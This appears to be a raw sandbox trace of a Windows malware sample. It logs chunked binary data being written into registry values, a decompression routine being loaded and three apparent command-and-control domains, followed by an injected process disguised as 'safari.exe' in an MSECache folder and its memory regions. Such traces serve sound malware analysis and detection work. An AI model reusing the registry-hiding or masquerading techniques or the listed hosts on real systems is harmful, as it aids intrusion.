	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] GetLastError () returned 0x0
	[0075.529] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_4") returned 10
	[0075.529] RegSetValueExW (in: hKey=0x238, lpValueName="gpscsdch_4", Reserved=0x0, dwType=0x3, lpData=0x3942020*, cbData=0x7d000 | out: lpData=0x3942020*) returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] GetLastError () returned 0x0
	[0075.584] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_5") returned 10
	[0075.584] RegSetValueExW (in: hKey=0x238, lpValueName="gpscsdch_5", Reserved=0x0, dwType=0x3, lpData=0x39bf020*, cbData=0x7d000 | out: lpData=0x39bf020*) returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.641] GetLastError () returned 0x0
	[0075.642] GetLastError () returned 0x0
	[0075.642] GetLastError () returned 0x0
	[0075.642] GetLastError () returned 0x0
	[0075.642] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_6") returned 10
	[0075.642] RegSetValueExW (in: hKey=0x238, lpValueName="gpscsdch_6", Reserved=0x0, dwType=0x3, lpData=0x3a3c020*, cbData=0x7d000 | out: lpData=0x3a3c020*) returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] GetLastError () returned 0x0
	[0075.715] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_7") returned 10
	[0075.715] RegSetValueExW (in: hKey=0x238, lpValueName="gpscsdch_7", Reserved=0x0, dwType=0x3, lpData=0x3ab9020*, cbData=0x55832 | out: lpData=0x3ab9020*) returned 0x0
	[0075.759] RegCloseKey (hKey=0x238) returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.760] GetLastError () returned 0x0
	[0075.761] GetLastError () returned 0x0
	[0075.761] GetLastError () returned 0x0
	[0075.761] GetLastError () returned 0x0
	[0075.761] GetLastError () returned 0x0
	[0075.761] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0075.761] GetProcAddress (hModule=0x77960000, lpProcName="RtlDecompressBuffer") returned 0x779d6b80
	[0075.838] GetLastError () returned 0x0
	[0075.838] GetLastError () returned 0x0
	[0075.838] GetLastError () returned 0x0
	[0075.838] GetLastError () returned 0x0
	[0075.838] GetLastError () returned 0x0
	[0075.838] GetLastError () returned 0x0
	[0075.838] GetLastError () returned 0x0
	[0075.838] GetLastError () returned 0x0
	[0075.838] GetLastError () returned 0x0
	[0075.838] GetLastError () returned 0x0
	[0075.838] GetLastError () returned 0x0
	[0075.839] GetLastError () returned 0x0
	[0075.839] GetLastError () returned 0x0
	[0075.840] GetLastError () returned 0x0
	[0075.840] GetLastError () returned 0x0
	[0075.841] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.845] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.846] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.847] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.848] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0075.849] GetLastError () returned 0x0
	[0081.532] lstrcpyA (in: lpString1=0x3fc0e90, lpString2="drk.fm604.com" | out: lpString1="drk.fm604.com") returned="drk.fm604.com"
	[0081.532] lstrcpyA (in: lpString1=0x3fc0eb0, lpString2="drk.fm604.com" | out: lpString1="drk.fm604.com") returned="drk.fm604.com"
	[0081.532] lstrcpyA (in: lpString1=0x3fc0ed0, lpString2="it.sunballast.de" | out: lpString1="it.sunballast.de") returned="it.sunballast.de"
	[0081.532] lstrcpyA (in: lpString1=0x3fc0ef0, lpString2="gtdspr.space" | out: lpString1="gtdspr.space") returned="gtdspr.space"
	[0081.532] OutputDebugStringA (lpOutputString="WMA 3") 

Thread:
	id = 63
	os_tid = 0xe2c


Thread:
	id = 64
	os_tid = 0xc48


Thread:
	id = 65
	os_tid = 0x55c


Thread:
	id = 66
	os_tid = 0xe8c


Thread:
	id = 67
	os_tid = 0x9a4


Thread:
	id = 68
	os_tid = 0xe50


Thread:
	id = 69
	os_tid = 0xec8


Thread:
	id = 70
	os_tid = 0xe44


Thread:
	id = 71
	os_tid = 0xd60

	[0084.148] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xffffffff, lpConsoleScreenBufferInfo=0x353fc80 | out: lpConsoleScreenBufferInfo=0x353fc80) returned 0

Thread:
	id = 83
	os_tid = 0xe60

	[0085.770] GetCurrentThreadId () returned 0xe60
	[0085.770] GetCurrentPackageId () returned 0x3d54
	[0085.770] GetLastError () returned 0x0
	[0085.770] SetLastError (dwErrCode=0x0) 
	[0085.771] WaitForSingleObject (hHandle=0x748, dwMilliseconds=0xffffffff) returned 0x0
	[0086.178] QueryPerformanceCounter (in: lpPerformanceCount=0x387fe84 | out: lpPerformanceCount=0x387fe84*=1816868500000) returned 1
	[0086.179] QueryPerformanceCounter (in: lpPerformanceCount=0x387fe80 | out: lpPerformanceCount=0x387fe80*=1816868500000) returned 1
	[0086.179] WaitForSingleObject (hHandle=0x748, dwMilliseconds=0xffffffff) 

Thread:
	id = 84
	os_tid = 0xf70

	[0085.771] GetCurrentThreadId () returned 0xf70
	[0085.771] GetLastError () returned 0x0
	[0085.771] SetLastError (dwErrCode=0x0) 
	[0085.771] WaitForSingleObject (hHandle=0x750, dwMilliseconds=0xffffffff) 

Thread:
	id = 85
	os_tid = 0x3f8

	[0085.771] GetCurrentThreadId () returned 0x3f8
	[0085.771] GetLastError () returned 0x0
	[0085.771] SetLastError (dwErrCode=0x0) 
	[0085.771] WaitForSingleObject (hHandle=0x760, dwMilliseconds=0xffffffff) 

Thread:
	id = 86
	os_tid = 0xa4

	[0085.774] GetCurrentThreadId () returned 0xa4
	[0085.774] GetLastError () returned 0x0
	[0085.774] SetLastError (dwErrCode=0x0) 
	[0085.774] WaitForSingleObject (hHandle=0x770, dwMilliseconds=0xffffffff) 

Process:
	id = "8"
	image_name = "safari.exe"
	filename = "c:\\program files (x86)\\msecache\\safari.exe"
	page_root = "0x370a000"
	os_pid = "0xc3c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "injection"
	parent_id = "6"
	os_parent_pid = "0xdb0"
	cmd_line = "\"C:\\Program Files (x86)\\MSECache\\safari.exe\" "
	cur_dir = "C:\\Program Files (x86)\\MSECache\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 966
	        start_va = 0x10000
	          end_va = 0x1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 967
	        start_va = 0x20000
	          end_va = 0x20fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 968
	        start_va = 0x30000
	          end_va = 0x44fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 969
	        start_va = 0x50000
	          end_va = 0x8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 970
	        start_va = 0x90000
	          end_va = 0x93fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000090000"
	        filename = ""

Region:
	              id = 971
	        start_va = 0xa0000
	          end_va = 0xa0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000a0000"
	        filename = ""

Region:
	              id = 972
	        start_va = 0xb0000
	          end_va = 0xb3fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000b0000"
	        filename = ""

Region:
	              id = 973
	        start_va = 0xc0000
	          end_va = 0xd6fff
	     entry_point = 0xc0000
	     region_type = mapped_file
	            name = "safari.exe"
	        filename = "\\Program Files (x86)\\MSECache\\safari.exe" (normalized: "c:\\program files (x86)\\msecache\\safari.exe")

Region:
	              id = 974
	        start_va = 0xe0000
	          end_va = 0x1dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000e0000"
	        filename = ""

Region:
	              id = 975
	        start_va = 0x1e0000
	          end_va = 0x1e1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001e0000"
	        filename = ""

Region:
	              id = 976
	        start_va = 0x1f0000
	          end_va = 0x1f0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001f0000"
	        filename = ""

Region:
	              id = 977
	        start_va = 0x200000
	          end_va = 0x3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 978
	        start_va = 0x400000
	          end_va = 0x403fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000400000"
	        filename = ""

Region:
	              id = 979
	        start_va = 0x410000
	          end_va = 0x427fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000410000"
	        filename = ""

Region:
	              id = 980
	        start_va = 0x430000
	          end_va = 0x43ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000430000"
	        filename = ""

Region:
	              id = 981
	        start_va = 0x440000
	          end_va = 0x4fdfff
	     entry_point = 0x440000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 982
	        start_va = 0x540000
	          end_va = 0x5fbfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000540000"
	        filename = ""

Region:
	              id = 983
	        start_va = 0x600000
	          end_va = 0x6fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000600000"
	        filename = ""

Region:
	              id = 984
	        start_va = 0x800000
	          end_va = 0x987fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000800000"
	        filename = ""

Region:
	              id = 985
	        start_va = 0x990000
	          end_va = 0xb10fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000990000"
	        filename = ""

Region:
	              id = 986
	        start_va = 0xb20000
	          end_va = 0x1f1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000b20000"
	        filename = ""

Region:
	              id = 987
	        start_va = 0x1f20000
	          end_va = 0x1f5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000001f20000"
	        filename = ""

Region:
	              id = 988
	        start_va = 0x2030000
	          end_va = 0x203ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002030000"
	        filename = ""

Region:
	              id = 989
	        start_va = 0x2040000
	          end_va = 0x213ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002040000"
	        filename = ""

Region:
	              id = 990
	        start_va = 0x2180000
	          end_va = 0x218ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002180000"
	        filename = ""

Region:
	              id = 991
	        start_va = 0x55c00000
	          end_va = 0x55c79fff
	     entry_point = 0x55c00000
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 992
	        start_va = 0x55c80000
	          end_va = 0x55c87fff
	     entry_point = 0x55c80000
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 993
	        start_va = 0x55c90000
	          end_va = 0x55cdffff
	     entry_point = 0x55c90000
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 994
	        start_va = 0x70020000
	          end_va = 0x7003cfff
	     entry_point = 0x70020000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")

Region:
	              id = 995
	        start_va = 0x70b10000
	          end_va = 0x70b84fff
	     entry_point = 0x70b10000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")

Region:
	              id = 996
	        start_va = 0x745e0000
	          end_va = 0x74671fff
	     entry_point = 0x745e0000
	     region_type = mapped_file
	            name = "apphelp.dll"
	        filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")

Region:
	              id = 997
	        start_va = 0x74680000
	          end_va = 0x74689fff
	     entry_point = 0x74680000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 998
	        start_va = 0x74690000
	          end_va = 0x746adfff
	     entry_point = 0x74690000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 999
	        start_va = 0x74720000
	          end_va = 0x74763fff
	     entry_point = 0x74720000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1000
	        start_va = 0x747c0000
	          end_va = 0x7487dfff
	     entry_point = 0x747c0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1001
	        start_va = 0x74880000
	          end_va = 0x74a3cfff
	     entry_point = 0x74880000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

